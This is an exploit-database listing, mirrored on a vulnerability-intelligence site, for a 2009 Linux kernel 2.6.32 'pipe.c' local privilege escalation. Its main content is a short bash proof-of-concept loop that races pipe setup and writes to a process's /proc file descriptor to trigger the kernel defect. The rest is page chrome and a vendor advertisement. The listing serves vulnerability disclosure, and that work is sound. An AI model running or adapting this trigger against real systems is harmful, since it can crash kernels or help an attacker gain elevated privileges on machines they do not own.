Lucene search

K

Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4)

๐Ÿ—“๏ธย 12 Nov 2009ย 00:00:00Reported byย Earl ChewTypeย 
exploitdb
ย exploitdb
๐Ÿ”—ย www.exploit-db.com๐Ÿ‘ย 1155ย Views

Linux Kernel 2.6.32 'pipe.c' Local Privilege Escalatio

Show more
Code
while : ; do
   { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
   PID=$!
   OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
        { read PID REST ; echo $PID; } )
   OUT="${OUT%% *}"
   DELAY=$((RANDOM * 1000 / 32768))
   usleep $((DELAY * 1000 + RANDOM % 1000 ))
   echo n > /proc/$OUT/fd/1                 # Trigger defect
done

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
12 Nov 2009 00:00Current
7.4High risk
Vulners AI Score7.4
1155
.json
Report